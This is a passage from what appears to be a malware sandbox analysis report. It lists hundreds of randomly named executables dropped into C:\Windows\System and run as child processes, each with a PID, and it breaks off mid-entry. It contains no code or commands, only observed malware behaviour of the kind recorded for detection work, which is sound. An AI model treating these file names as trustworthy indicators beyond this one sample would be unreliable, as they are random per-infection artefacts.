- C:\Windows\System\XeYUzYW.exe
  C:\Windows\System\XeYUzYW.exe
  2⤵
  - Executes dropped EXE
  PID:3852
- C:\Windows\System\MWxMakN.exe
  C:\Windows\System\MWxMakN.exe
  2⤵
  - Executes dropped EXE
  PID:3988
- C:\Windows\System\kVYUFUW.exe
  C:\Windows\System\kVYUFUW.exe
  2⤵
  - Executes dropped EXE
  PID:1752
- C:\Windows\System\ioBFfWJ.exe
  C:\Windows\System\ioBFfWJ.exe
  2⤵
  - Executes dropped EXE
  PID:3640
- C:\Windows\System\vFjQqZj.exe
  C:\Windows\System\vFjQqZj.exe
  2⤵
  - Executes dropped EXE
  PID:3984
- C:\Windows\System\nHBtzYS.exe
  C:\Windows\System\nHBtzYS.exe
  2⤵
  - Executes dropped EXE
  PID:4276
- C:\Windows\System\xLgluEU.exe
  C:\Windows\System\xLgluEU.exe
  2⤵
  - Executes dropped EXE
  PID:3908
- C:\Windows\System\KczLEph.exe
  C:\Windows\System\KczLEph.exe
  2⤵
  - Executes dropped EXE
  PID:384
- C:\Windows\System\VGDsjTV.exe
  C:\Windows\System\VGDsjTV.exe
  2⤵
  - Executes dropped EXE
  PID:4580
- C:\Windows\System\dFpNPCy.exe
  C:\Windows\System\dFpNPCy.exe
  2⤵
  - Executes dropped EXE
  PID:628
- C:\Windows\System\naKxSdN.exe
  C:\Windows\System\naKxSdN.exe
  2⤵
  - Executes dropped EXE
  PID:1436
- C:\Windows\System\CxNfVKs.exe
  C:\Windows\System\CxNfVKs.exe
  2⤵
  - Executes dropped EXE
  PID:5020
- C:\Windows\System\fwlPmII.exe
  C:\Windows\System\fwlPmII.exe
  2⤵
  - Executes dropped EXE
  PID:3120
- C:\Windows\System\AgPuUwz.exe
  C:\Windows\System\AgPuUwz.exe
  2⤵
  - Executes dropped EXE
  PID:2544
- C:\Windows\System\vkZDIfp.exe
  C:\Windows\System\vkZDIfp.exe
  2⤵
  - Executes dropped EXE
  PID:3684
- C:\Windows\System\DOkUtpC.exe
  C:\Windows\System\DOkUtpC.exe
  2⤵
  - Executes dropped EXE
  PID:4432
- C:\Windows\System\KEOjxCx.exe
  C:\Windows\System\KEOjxCx.exe
  2⤵
  - Executes dropped EXE
  PID:4704
- C:\Windows\System\QffuaTu.exe
  C:\Windows\System\QffuaTu.exe
  2⤵
  - Executes dropped EXE
  PID:3420
- C:\Windows\System\MVvRknj.exe
  C:\Windows\System\MVvRknj.exe
  2⤵
  - Executes dropped EXE
  PID:2280
- C:\Windows\System\FcaEKzy.exe
  C:\Windows\System\FcaEKzy.exe
  2⤵
  - Executes dropped EXE
  PID:1168
- C:\Windows\System\asPejez.exe
  C:\Windows\System\asPejez.exe
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Windows\System\MitczcZ.exe
  C:\Windows\System\MitczcZ.exe
  2⤵
  - Executes dropped EXE
  PID:1284
- C:\Windows\System\SBKlFAh.exe
  C:\Windows\System\SBKlFAh.exe
  2⤵
  - Executes dropped EXE
  PID:3808
- C:\Windows\System\OCHwHqp.exe
  C:\Windows\System\OCHwHqp.exe
  2⤵
  - Executes dropped EXE
  PID:1880
- C:\Windows\System\VEgbVHo.exe
  C:\Windows\System\VEgbVHo.exe
  2⤵
  - Executes dropped EXE
  PID:4740
- C:\Windows\System\nsTYzay.exe
  C:\Windows\System\nsTYzay.exe
  2⤵
  - Executes dropped EXE
  PID:5028
- C:\Windows\System\HdIeSHl.exe
  C:\Windows\System\HdIeSHl.exe
  2⤵
  - Executes dropped EXE
  PID:1724
- C:\Windows\System\fgaeiGZ.exe
  C:\Windows\System\fgaeiGZ.exe
  2⤵
  - Executes dropped EXE
  PID:3096
- C:\Windows\System\FtGaVdO.exe
  C:\Windows\System\FtGaVdO.exe
  2⤵
  - Executes dropped EXE
  PID:3380
- C:\Windows\System\DnKIgNo.exe
  C:\Windows\System\DnKIgNo.exe
  2⤵
  - Executes dropped EXE
  PID:2428
- C:\Windows\System\MPaiNKc.exe
  C:\Windows\System\MPaiNKc.exe
  2⤵
  - Executes dropped EXE
  PID:3188
- C:\Windows\System\pgCxvyC.exe
  C:\Windows\System\pgCxvyC.exe
  2⤵
  - Executes dropped EXE
  PID:1444
- C:\Windows\System\nVtkreW.exe
  C:\Windows\System\nVtkreW.exe
  2⤵
  - Executes dropped EXE
  PID:944
- C:\Windows\System\eyYsQtm.exe
  C:\Windows\System\eyYsQtm.exe
  2⤵
  - Executes dropped EXE
  PID:4236
- C:\Windows\System\SVzVcDo.exe
  C:\Windows\System\SVzVcDo.exe
  2⤵
  - Executes dropped EXE
  PID:1128
- C:\Windows\System\KEJxmSr.exe
  C:\Windows\System\KEJxmSr.exe
  2⤵
  - Executes dropped EXE
  PID:1532
- C:\Windows\System\qKTgYaF.exe
  C:\Windows\System\qKTgYaF.exe
  2⤵
  - Executes dropped EXE
  PID:4956
- C:\Windows\System\duxhVpk.exe
  C:\Windows\System\duxhVpk.exe
  2⤵
  - Executes dropped EXE
  PID:3964
- C:\Windows\System\tFIfeUD.exe
  C:\Windows\System\tFIfeUD.exe
  2⤵
  - Executes dropped EXE
  PID:3456
- C:\Windows\System\lYeWAGh.exe
  C:\Windows\System\lYeWAGh.exe
  2⤵
  - Executes dropped EXE
  PID:2736
- C:\Windows\System\xkVpITr.exe
  C:\Windows\System\xkVpITr.exe
  2⤵
  - Executes dropped EXE
  PID:672
- C:\Windows\System\HLHWDuA.exe
  C:\Windows\System\HLHWDuA.exe
  2⤵
  - Executes dropped EXE
  PID:3004
- C:\Windows\System\vBxbEul.exe
  C:\Windows\System\vBxbEul.exe
  2⤵
  - Executes dropped EXE
  PID:4720
- C:\Windows\System\RimAnrR.exe
  C:\Windows\System\RimAnrR.exe
  2⤵
  - Executes dropped EXE
  PID:3792
- C:\Windows\System\XmJuXGp.exe
  C:\Windows\System\XmJuXGp.exe
  2⤵
  - Executes dropped EXE
  PID:4396
- C:\Windows\System\IidLkFc.exe
  C:\Windows\System\IidLkFc.exe
  2⤵
  - Executes dropped EXE
  PID:3360
- C:\Windows\System\cNJzrzK.exe
  C:\Windows\System\cNJzrzK.exe
  2⤵
  - Executes dropped EXE
  PID:1696
- C:\Windows\System\VmmyzuM.exe
  C:\Windows\System\VmmyzuM.exe
  2⤵
  - Executes dropped EXE
  PID:1384
- C:\Windows\System\lxJCwih.exe
  C:\Windows\System\lxJCwih.exe
  2⤵
  - Executes dropped EXE
  PID:3200
- C:\Windows\System\tMUmTce.exe
  C:\Windows\System\tMUmTce.exe
  2⤵
  - Executes dropped EXE
  PID:4408
- C:\Windows\System\rwbBuDl.exe
  C:\Windows\System\rwbBuDl.exe
  2⤵
  - Executes dropped EXE
  PID:1296
- C:\Windows\System\mfukWBe.exe
  C:\Windows\System\mfukWBe.exe
  2⤵
  - Executes dropped EXE
  PID:4360
- C:\Windows\System\fKTHPnI.exe
  C:\Windows\System\fKTHPnI.exe
  2⤵
  - Executes dropped EXE
  PID:3856
- C:\Windows\System\oqrmohf.exe
  C:\Windows\System\oqrmohf.exe
  2⤵
  - Executes dropped EXE
  PID:4768
- C:\Windows\System\crjeLPi.exe
  C:\Windows\System\crjeLPi.exe
  2⤵
  - Executes dropped EXE
  PID:1784
- C:\Windows\System\AnHJGdc.exe
  C:\Windows\System\AnHJGdc.exe
  2⤵
  - Executes dropped EXE
  PID:2676
- C:\Windows\System\oXExMMj.exe
  C:\Windows\System\oXExMMj.exe
  2⤵
  - Executes dropped EXE
  PID:4436
- C:\Windows\System\fghdpLC.exe
  C:\Windows\System\fghdpLC.exe
  2⤵
  - Executes dropped EXE
  PID:776
- C:\Windows\System\HHnEMGw.exe
  C:\Windows\System\HHnEMGw.exe
  2⤵
  - Executes dropped EXE
  PID:4384
- C:\Windows\System\kTRWOLF.exe
  C:\Windows\System\kTRWOLF.exe
  2⤵
  - Executes dropped EXE
  PID:4476
- C:\Windows\System\RLDRqom.exe
  C:\Windows\System\RLDRqom.exe
  2⤵
  - Executes dropped EXE
  PID:3876
- C:\Windows\System\Bsuxbwy.exe
  C:\Windows\System\Bsuxbwy.exe
  2⤵
  PID:540
- C:\Windows\System\ECPKgkY.exe
  C:\Windows\System\ECPKgkY.exe
  2⤵
  PID:4448
- C:\Windows\System\BNsvzre.exe
  C:\Windows\System\BNsvzre.exe
  2⤵
  PID:4216
- C:\Windows\System\BRGrxXH.exe
  C:\Windows\System\BRGrxXH.exe
  2⤵
  PID:3632
- C:\Windows\System\cZnRezf.exe
  C:\Windows\System\cZnRezf.exe
  2⤵
  PID:376
- C:\Windows\System\NTddZtz.exe
  C:\Windows\System\NTddZtz.exe
  2⤵
  PID:2472
- C:\Windows\System\HJRTmwd.exe
  C:\Windows\System\HJRTmwd.exe
  2⤵
  PID:4016
- C:\Windows\System\heisLXr.exe
  C:\Windows\System\heisLXr.exe
  2⤵
  PID:2712
- C:\Windows\System\ASZVacL.exe
  C:\Windows\System\ASZVacL.exe
  2⤵
  PID:2360
- C:\Windows\System\fEjEEAb.exe
  C:\Windows\System\fEjEEAb.exe
  2⤵
  PID:3960
- C:\Windows\System\AwZJyLS.exe
  C:\Windows\System\AwZJyLS.exe
  2⤵
  PID:2728
- C:\Windows\System\GTmUefR.exe
  C:\Windows\System\GTmUefR.exe
  2⤵
  PID:3696
- C:\Windows\System\nJuQgVo.exe
  C:\Windows\System\nJuQgVo.exe
  2⤵
  PID:724
- C:\Windows\System\llFiMYz.exe
  C:\Windows\System\llFiMYz.exe
  2⤵
  PID:1336
- C:\Windows\System\PvyaIBn.exe
  C:\Windows\System\PvyaIBn.exe
  2⤵
  PID:432
- C:\Windows\System\CciEUQk.exe
  C:\Windows\System\CciEUQk.exe
  2⤵
  PID:5132
- C:\Windows\System\mHtpDLg.exe
  C:\Windows\System\mHtpDLg.exe
  2⤵
  PID:5148
- C:\Windows\System\iMYyWMv.exe
  C:\Windows\System\iMYyWMv.exe
  2⤵
  PID:5164
- C:\Windows\System\fvfkIAa.exe
  C:\Windows\System\fvfkIAa.exe
  2⤵
  PID:5188
- C:\Windows\System\biTwgcR.exe
  C:\Windows\System\biTwgcR.exe
  2⤵
  PID:5216
- C:\Windows\System\ltnlDAN.exe
  C:\Windows\System\ltnlDAN.exe
  2⤵
  PID:5236
- C:\Windows\System\ipVCbRW.exe
  C:\Windows\System\ipVCbRW.exe
  2⤵
  PID:5260
- C:\Windows\System\BUkctXw.exe
  C:\Windows\System\BUkctXw.exe
  2⤵
  PID:5276
- C:\Windows\System\uhQBWSi.exe
  C:\Windows\System\uhQBWSi.exe
  2⤵
  PID:5296
- C:\Windows\System\ANbuRyx.exe
  C:\Windows\System\ANbuRyx.exe
  2⤵
  PID:5324
- C:\Windows\System\fDInqvA.exe
  C:\Windows\System\fDInqvA.exe
  2⤵
  PID:5340
- C:\Windows\System\UQghZgd.exe
  C:\Windows\System\UQghZgd.exe
  2⤵
  PID:5356
- C:\Windows\System\RkpkORb.exe
  C:\Windows\System\RkpkORb.exe
  2⤵
  PID:5376
- C:\Windows\System\TFJCwZK.exe
  C:\Windows\System\TFJCwZK.exe
  2⤵
  PID:5400
- C:\Windows\System\zAlQvXu.exe
  C:\Windows\System\zAlQvXu.exe
  2⤵
  PID:5416
- C:\Windows\System\NMktgNi.exe
  C:\Windows\System\NMktgNi.exe
  2⤵
  PID:5444
- C:\Windows\System\mlIVdgz.exe
  C:\Windows\System\mlIVdgz.exe
  2⤵
  PID:5468
- C:\Windows\System\lijlvvd.exe
  C:\Windows\System\lijlvvd.exe
  2⤵
  PID:5484
- C:\Windows\System\TNghMUx.exe
  C:\Windows\System\TNghMUx.exe
  2⤵
  PID:5508
- C:\Windows\System\HeTTVfI.exe
  C:\Windows\System\HeTTVfI.exe
  2⤵
  PID:5528
- C:\Windows\System\nGDRJsE.exe
  C:\Windows\System\nGDRJsE.exe
  2⤵
  PID:5552
- C:\Windows\System\mnWnxSY.exe
  C:\Windows\System\mnWnxSY.exe
  2⤵
  PID:5588
- C:\Windows\System\sBIkwoW.exe
  C:\Windows\System\sBIkwoW.exe
  2⤵
  PID:5604
- C:\Windows\System\HinMfWK.exe
  C:\Windows\System\HinMfWK.exe
  2⤵
  PID:5648
- C:\Windows\System\zScwlos.exe
  C:\Windows\System\zScwlos.exe
  2⤵
  PID:5668
- C:\Windows\System\CqbONrU.exe
  C:\Windows\System\CqbONrU.exe
  2⤵
  PID:5696
- C:\Windows\System\cbaMhSm.exe
  C:\Windows\System\cbaMhSm.exe
  2⤵
  PID:5712
- C:\Windows\System\oeAJoGK.exe
  C:\Windows\System\oeAJoGK.exe
  2⤵
  PID:5740
- C:\Windows\System\GaORkau.exe
  C:\Windows\System\GaORkau.exe
  2⤵
  PID:5756
- C:\Windows\System\gaFpgFF.exe
  C:\Windows\System\gaFpgFF.exe
  2⤵
  PID:5776
- C:\Windows\System\QhDVaeC.exe
  C:\Windows\System\QhDVaeC.exe
  2⤵
  PID:5800
- C:\Windows\System\HbzpFRh.exe
  C:\Windows\System\HbzpFRh.exe
  2⤵
  PID:5816
- C:\Windows\System\AbdZoBW.exe
  C:\Windows\System\AbdZoBW.exe
  2⤵
  PID:5840
- C:\Windows\System\vobMWPb.exe
  C:\Windows\System\vobMWPb.exe
  2⤵
  PID:5864
- C:\Windows\System\OYuVdxe.exe
  C:\Windows\System\OYuVdxe.exe
  2⤵
  PID:5904
- C:\Windows\System\sfCeWBq.exe
  C:\Windows\System\sfCeWBq.exe
  2⤵
  PID:5924
- C:\Windows\System\UvLGbcT.exe
  C:\Windows\System\UvLGbcT.exe
  2⤵
  PID:5956
- C:\Windows\System\fYrracd.exe
  C:\Windows\System\fYrracd.exe
  2⤵
  PID:5972
- C:\Windows\System\MKGBgUR.exe
  C:\Windows\System\MKGBgUR.exe
  2⤵
  PID:5996
- C:\Windows\System\OkqliCb.exe
  C:\Windows\System\OkqliCb.exe
  2⤵
  PID:6020
- C:\Windows\System\bvSqjkJ.exe
  C:\Windows\System\bvSqjkJ.exe
  2⤵
  PID:6036
- C:\Windows\System\AxrQLlf.exe
  C:\Windows\System\AxrQLlf.exe
  2⤵
  PID:6056
- C:\Windows\System\fzEyChB.exe
  C:\Windows\System\fzEyChB.exe
  2⤵
  PID:6080
- C:\Windows\System\Dajsyek.exe
  C:\Windows\System\Dajsyek.exe
  2⤵
  PID:6096
- C:\Windows\System\rcDffwU.exe
  C:\Windows\System\rcDffwU.exe
  2⤵
  PID:4456
- C:\Windows\System\uLFvyGt.exe
  C:\Windows\System\uLFvyGt.exe
  2⤵
  PID:4204
- C:\Windows\System\TWbEyYc.exe
  C:\Windows\System\TWbEyYc.exe
  2⤵
  PID:2424
- C:\Windows\System\UKDYfOX.exe
  C:\Windows\System\UKDYfOX.exe
  2⤵
  PID:1912
- C:\Windows\System\zBcOMqs.exe
  C:\Windows\System\zBcOMqs.exe
  2⤵
  PID:2332
- C:\Windows\System\NFwJRph.exe
  C:\Windows\System\NFwJRph.exe
  2⤵
  PID:3068
- C:\Windows\System\iQnyGPU.exe
  C:\Windows\System\iQnyGPU.exe
  2⤵
  PID:4608
- C:\Windows\System\uCGKVOu.exe
  C:\Windows\System\uCGKVOu.exe
  2⤵
  PID:396
- C:\Windows\System\OJIzWlG.exe
  C:\Windows\System\OJIzWlG.exe
  2⤵
  PID:744
- C:\Windows\System\ZXECsbl.exe
  C:\Windows\System\ZXECsbl.exe
  2⤵
  PID:4196
- C:\Windows\System\BlfvAWz.exe
  C:\Windows\System\BlfvAWz.exe
  2⤵
  PID:5316
- C:\Windows\System\YflcLqr.exe
  C:\Windows\System\YflcLqr.exe
  2⤵
  PID:4984
- C:\Windows\System\tBNMTth.exe
  C:\Windows\System\tBNMTth.exe
  2⤵
  PID:4532
- C:\Windows\System\WzifWXr.exe
  C:\Windows\System\WzifWXr.exe
  2⤵
  PID:4336
- C:\Windows\System\PgcrVor.exe
  C:\Windows\System\PgcrVor.exe
  2⤵
  PID:3344
- C:\Windows\System\JbiWISD.exe
  C:\Windows\System\JbiWISD.exe
  2⤵
  PID:1744
- C:\Windows\System\OpBmKTT.exe
  C:\Windows\System\OpBmKTT.exe
  2⤵
  PID:5708
- C:\Windows\System\KrhvCRj.exe
  C:\Windows\System\KrhvCRj.exe
  2⤵
  PID:1712
- C:\Windows\System\KepNHSX.exe
  C:\Windows\System\KepNHSX.exe
  2⤵
  PID:4656
- C:\Windows\System\vuruhTh.exe
  C:\Windows\System\vuruhTh.exe
  2⤵
  PID:5176
- C:\Windows\System\gzdlWel.exe
  C:\Windows\System\gzdlWel.exe
  2⤵
  PID:5244
- C:\Windows\System\kXgtEdJ.exe
  C:\Windows\System\kXgtEdJ.exe
  2⤵
  PID:6064
- C:\Windows\System\OKKEsat.exe
  C:\Windows\System\OKKEsat.exe
  2⤵
  PID:5332
- C:\Windows\System\wYwMfvq.exe
  C:\Windows\System\wYwMfvq.exe
  2⤵
  PID:5364
- C:\Windows\System\AuYqNhg.exe
  C:\Windows\System\AuYqNhg.exe
  2⤵
  PID:5412
- C:\Windows\System\LnQgknU.exe
  C:\Windows\System\LnQgknU.exe
  2⤵
  PID:5452
- C:\Windows\System\ImEJAmj.exe
  C:\Windows\System\ImEJAmj.exe
  2⤵
  PID:5504
- C:\Windows\System\kOiylyk.exe
  C:\Windows\System\kOiylyk.exe
  2⤵
  PID:5544
- C:\Windows\System\NeopBge.exe
  C:\Windows\System\NeopBge.exe
  2⤵
  PID:6160
- C:\Windows\System\cxOmVjA.exe
  C:\Windows\System\cxOmVjA.exe
  2⤵
  PID:6180
- C:\Windows\System\fFoevwD.exe
  C:\Windows\System\fFoevwD.exe
  2⤵
  PID:6208
- C:\Windows\System\EdIfavl.exe
  C:\Windows\System\EdIfavl.exe
  2⤵
  PID:6224
- C:\Windows\System\sRCnyjQ.exe
  C:\Windows\System\sRCnyjQ.exe
  2⤵
  PID:6244
- C:\Windows\System\lwuQIIn.exe
  C:\Windows\System\lwuQIIn.exe
  2⤵
  PID:6260
- C:\Windows\System\PYzdCTB.exe
  C:\Windows\System\PYzdCTB.exe
  2⤵
  PID:6284
- C:\Windows\System\gVTqfHF.exe
  C:\Windows\System\gVTqfHF.exe
  2⤵
  PID:6304
- C:\Windows\System\RYcoZMx.exe
  C:\Windows\System\RYcoZMx.exe
  2⤵
  PID:6324
- C:\Windows\System\iCRYVDl.exe
  C:\Windows\System\iCRYVDl.exe
  2⤵
  PID:6348
- C:\Windows\System\bDuNvow.exe
  C:\Windows\System\bDuNvow.exe
  2⤵
  PID:6372
- C:\Windows\System\PzOuLCe.exe
  C:\Windows\System\PzOuLCe.exe
  2⤵
  PID:6388
- C:\Windows\System\qkNEYCh.exe
  C:\Windows\System\qkNEYCh.exe
  2⤵
  PID:6408
- C:\Windows\System\IunHthn.exe
  C:\Windows\System\IunHthn.exe
  2⤵
  PID:6432
- C:\Windows\System\jiGxxME.exe
  C:\Windows\System\jiGxxME.exe
  2⤵
  PID:6452
- C:\Windows\System\IpduoRr.exe
  C:\Windows\System\IpduoRr.exe
  2⤵
  PID:6476
- C:\Windows\System\CScBdTo.exe
  C:\Windows\System\CScBdTo.exe
  2⤵
  PID:6496
- C:\Windows\System\vDORmgo.exe
  C:\Windows\System\vDORmgo.exe
  2⤵
  PID:6516
- C:\Windows\System\AdTpItu.exe
  C:\Windows\System\AdTpItu.exe
  2⤵
  PID:6536
- C:\Windows\System\GLYhEwI.exe
  C:\Windows\System\GLYhEwI.exe
  2⤵
  PID:6552
- C:\Windows\System\qIHgwPU.exe
  C:\Windows\System\qIHgwPU.exe
  2⤵
  PID:6576
- C:\Windows\System\aUhIqCO.exe
  C:\Windows\System\aUhIqCO.exe
  2⤵
  PID:6592
- C:\Windows\System\FeReCWW.exe
  C:\Windows\System\FeReCWW.exe
  2⤵
  PID:6616
- C:\Windows\System\eoRtpWQ.exe
  C:\Windows\System\eoRtpWQ.exe
  2⤵
  PID:6632
- C:\Windows\System\iUHgLSf.exe
  C:\Windows\System\iUHgLSf.exe
  2⤵
  PID:6688
- C:\Windows\System\DqqEiBp.exe
  C:\Windows\System\DqqEiBp.exe
  2⤵
  PID:6708
- C:\Windows\System\hixYOUv.exe
  C:\Windows\System\hixYOUv.exe
  2⤵
  PID:6724
- C:\Windows\System\Artypyw.exe
  C:\Windows\System\Artypyw.exe
  2⤵
  PID:6756
- C:\Windows\System\HxYoukD.exe
  C:\Windows\System\HxYoukD.exe
  2⤵
  PID:6772
- C:\Windows\System\yPgYdZJ.exe
  C:\Windows\System\yPgYdZJ.exe
  2⤵
  PID:6792
- C:\Windows\System\MZhbDxc.exe
  C:\Windows\System\MZhbDxc.exe
  2⤵
  PID:6816
- C:\Windows\System\dmfUfbb.exe
  C:\Windows\System\dmfUfbb.exe
  2⤵
  PID:6840
- C:\Windows\System\svDGevf.exe
  C:\Windows\System\svDGevf.exe
  2⤵
  PID:6868
- C:\Windows\System\EBRpAsd.exe
  C:\Windows\System\EBRpAsd.exe
  2⤵
  PID:6884
- C:\Windows\System\vesfVQd.exe
  C:\Windows\System\vesfVQd.exe
  2⤵
  PID:6908
- C:\Windows\System\bUKwGcE.exe
  C:\Windows\System\bUKwGcE.exe
  2⤵
  PID:6924
- C:\Windows\System\PVeAXfN.exe
  C:\Windows\System\PVeAXfN.exe
  2⤵
  PID:6948
- C:\Windows\System\jKPpGGg.exe
  C:\Windows\System\jKPpGGg.exe
  2⤵
  PID:6972
- C:\Windows\System\bqzSlZG.exe
  C:\Windows\System\bqzSlZG.exe
  2⤵
  PID:5304
- C:\Windows\System\gaaMFkk.exe
  C:\Windows\System\gaaMFkk.exe
  2⤵
  PID:5624
- C:\Windows\System\LajjiQS.exe
  C:\Windows\System\LajjiQS.exe
  2⤵
  PID:6112
- C:\Windows\System\YsCflOa.exe
  C:\Windows\System\YsCflOa.exe
  2⤵
  PID:5768
- C:\Windows\System\ydFmlLB.exe
  C:\Windows\System\ydFmlLB.exe
  2⤵
  PID:5808
- C:\Windows\System\xvfhPtj.exe
  C:\Windows\System\xvfhPtj.exe
  2⤵
  PID:5848
- C:\Windows\System\jpbhUKs.exe
  C:\Windows\System\jpbhUKs.exe
  2⤵
  PID:5896
- C:\Windows\System\bQQsHcc.exe
  C:\Windows\System\bQQsHcc.exe
  2⤵
  PID:5932
- C:\Windows\System\tdFEUNB.exe
  C:\Windows\System\tdFEUNB.exe
  2⤵
  PID:3820
- C:\Windows\System\gilaOKT.exe
  C:\Windows\System\gilaOKT.exe
  2⤵
  PID:5964
- C:\Windows\System\KMSlvNz.exe
  C:\Windows\System\KMSlvNz.exe
  2⤵
  PID:6004
- C:\Windows\System\Tlkvkyq.exe
  C:\Windows\System\Tlkvkyq.exe
  2⤵
  PID:6088
- C:\Windows\System\kDoSZmA.exe
  C:\Windows\System\kDoSZmA.exe
  2⤵
  PID:3084
- C:\Windows\System\nlucBLt.exe
  C:\Windows\System\nlucBLt.exe
  2⤵
  PID:2148
- C:\Windows\System\KURuLOI.exe
  C:\Windows\System\KURuLOI.exe
  2⤵
  PID:4604
- C:\Windows\System\zVPGfGe.exe
  C:\Windows\System\zVPGfGe.exe
  2⤵
  PID:60
- C:\Windows\System\KUCnoiy.exe
  C:\Windows\System\KUCnoiy.exe
  2⤵
  PID:5704
- C:\Windows\System\HuJRUHF.exe
  C:\Windows\System\HuJRUHF.exe
  2⤵
  PID:2184
- C:\Windows\System\zWjqMNa.exe
  C:\Windows\System\zWjqMNa.exe
  2⤵
  PID:5476
- C:\Windows\System\hwTkmaA.exe
  C:\Windows\System\hwTkmaA.exe
  2⤵
  PID:6268
- C:\Windows\System\wcajxys.exe
  C:\Windows\System\wcajxys.exe
  2⤵
  PID:6560
- C:\Windows\System\brgMWEK.exe
  C:\Windows\System\brgMWEK.exe
  2⤵
  PID:6732
- C:\Windows\System\pgHzbtV.exe
  C:\Windows\System\pgHzbtV.exe
  2⤵
  PID:6932
- C:\Windows\System\LEFEQSY.exe
  C:\Windows\System\LEFEQSY.exe
  2⤵
  PID:6172
- C:\Windows\System\KowuuKg.exe
  C:\Windows\System\KowuuKg.exe
  2⤵
  PID:6220
- C:\Windows\System\wQtGARY.exe
  C:\Windows\System\wQtGARY.exe
  2⤵
  PID:6544
- C:\Windows\System\pNjYQEy.exe
  C:\Windows\System\pNjYQEy.exe
  2⤵
  PID:6716
- C:\Windows\System\kCKzGDO.exe
  C:\Windows\System\kCKzGDO.exe
  2⤵
  PID:6788
- C:\Windows\System\fiTJQCS.exe
  C:\Windows\System\fiTJQCS.exe
  2⤵
  PID:7184
- C:\Windows\System\tZOFYca.exe
  C:\Windows\System\tZOFYca.exe
  2⤵
  PID:7200
- C:\Windows\System\fUAZPLL.exe
  C:\Windows\System\fUAZPLL.exe
  2⤵
  PID:7220
- C:\Windows\System\siSeQwk.exe
  C:\Windows\System\siSeQwk.exe
  2⤵
  PID:7240
- C:\Windows\System\bZaIuFn.exe
  C:\Windows\System\bZaIuFn.exe
  2⤵
  PID:7260
- C:\Windows\System\igiBQJz.exe
  C:\Windows\System\igiBQJz.exe
  2⤵
  PID:7284
- C:\Windows\System\JennUdr.exe
  C:\Windows\System\JennUdr.exe
  2⤵
  PID:7300
- C:\Windows\System\jvXynzw.exe
  C:\Windows\System\jvXynzw.exe
  2⤵
  PID:7324
- C:\Windows\System\qnuhVxj.exe
  C:\Windows\System\qnuhVxj.exe
  2⤵
  PID:7344
- C:\Windows\System\UzkJsCV.exe
  C:\Windows\System\UzkJsCV.exe
  2⤵
  PID:7364
- C:\Windows\System\BAVOtPY.exe
  C:\Windows\System\BAVOtPY.exe
  2⤵
  PID:7380
- C:\Windows\System\vgKaNxe.exe
  C:\Windows\System\vgKaNxe.exe
  2⤵
  PID:7408
- C:\Windows\System\QNNFgvE.exe
  C:\Windows\System\QNNFgvE.exe
  2⤵
  PID:7432
- C:\Windows\System\AYoOkbj.exe
  C:\Windows\System\AYoOkbj.exe
  2⤵
  PID:7456
- C:\Windows\System\OcCNpzJ.exe
  C:\Windows\System\OcCNpzJ.exe
  2⤵
  PID:7472
- C:\Windows\System\MFyWtYG.exe
  C:\Windows\System\MFyWtYG.exe
  2⤵
  PID:7492
- C:\Windows\System\HRXiOyb.exe
  C:\Windows\System\HRXiOyb.exe
  2⤵
  PID:7508
- C:\Windows\System\wrLJrba.exe
  C:\Windows\System\wrLJrba.exe
  2⤵
  PID:7608
- C:\Windows\System\uEhNjbo.exe
  C:\Windows\System\uEhNjbo.exe
  2⤵
  PID:7628
- C:\Windows\System\WhgXykz.exe
  C:\Windows\System\WhgXykz.exe
  2⤵
  PID:7644
- C:\Windows\System\tkkgEIc.exe
  C:\Windows\System\tkkgEIc.exe
  2⤵
  PID:7668
- C:\Windows\System\snHfWWN.exe
  C:\Windows\System\snHfWWN.exe
  2⤵
  PID:7688
- C:\Windows\System\GAlTPPc.exe
  C:\Windows\System\GAlTPPc.exe
  2⤵
  PID:7708
- C:\Windows\System\GKeBbuF.exe
  C:\Windows\System\GKeBbuF.exe
  2⤵
  PID:7728
- C:\Windows\System\uPyrjYQ.exe
  C:\Windows\System\uPyrjYQ.exe
  2⤵
  PID:7748
- C:\Windows\System\eSTWfzb.exe
  C:\Windows\System\eSTWfzb.exe
  2⤵
  PID:7764
- C:\Windows\System\exzAYsW.exe
  C:\Windows\System\exzAYsW.exe
  2⤵
  PID:7784
- C:\Windows\System\jFDCbXK.exe
  C:\Windows\System\jFDCbXK.exe
  2⤵
  PID:7804
- C:\Windows\System\XCRjVJy.exe
  C:\Windows\System\XCRjVJy.exe
  2⤵
  PID:7832
- C:\Windows\System\YhQFyTq.exe
  C:\Windows\System\YhQFyTq.exe
  2⤵
  PID:7848
- C:\Windows\System\nPHpgmS.exe
  C:\Windows\System\nPHpgmS.exe
  2⤵
  PID:7864
- C:\Windows\System\UPOkqqO.exe
  C:\Windows\System\UPOkqqO.exe
  2⤵
  PID:7888
- C:\Windows\System\NpyQXNl.exe
  C:\Windows\System\NpyQXNl.exe
  2⤵
  PID:7912
- C:\Windows\System\GeLkhrm.exe
  C:\Windows\System\GeLkhrm.exe
  2⤵
  PID:7932
- C:\Windows\System\NdLSNJg.exe
  C:\Windows\System\NdLSNJg.exe
  2⤵
  PID:7952
- C:\Windows\System\VkjbKHM.exe
  C:\Windows\System\VkjbKHM.exe
  2⤵
  PID:7968
- C:\Windows\System\WwIaHdb.exe
  C:\Windows\System\WwIaHdb.exe
  2⤵
  PID:7988
- C:\Windows\System\cTRuNNX.exe
  C:\Windows\System\cTRuNNX.exe
  2⤵
  PID:8016
- C:\Windows\System\oqhgrwV.exe
  C:\Windows\System\oqhgrwV.exe
  2⤵
  PID:8036
- C:\Windows\System\DEtAvRq.exe
  C:\Windows\System\DEtAvRq.exe
  2⤵
  PID:8056
- C:\Windows\System\XdnezJy.exe
  C:\Windows\System\XdnezJy.exe
  2⤵
  PID:8080
- C:\Windows\System\tzOAQVU.exe
  C:\Windows\System\tzOAQVU.exe
  2⤵
  PID:8096
- C:\Windows\System\XnnSkzN.exe
  C:\Windows\System\XnnSkzN.exe
  2⤵
  PID:8128
- C:\Windows\System\vUnlFfk.exe
  C:\Windows\System\vUnlFfk.exe
  2⤵
  PID:8148
- C:\Windows\System\gysidga.exe
  C:\Windows\System\gysidga.exe
  2⤵
  PID:8168
- C:\Windows\System\InynGeb.exe
  C:\Windows\System\InynGeb.exe
  2⤵
  PID:6852
- C:\Windows\System\KKNKmql.exe
  C:\Windows\System\KKNKmql.exe
  2⤵
  PID:6460
- C:\Windows\System\fYuVEEX.exe
  C:\Windows\System\fYuVEEX.exe
  2⤵
  PID:6492
- C:\Windows\System\HRvteVF.exe
  C:\Windows\System\HRvteVF.exe
  2⤵
  PID:5752
- C:\Windows\System\HPsaegz.exe
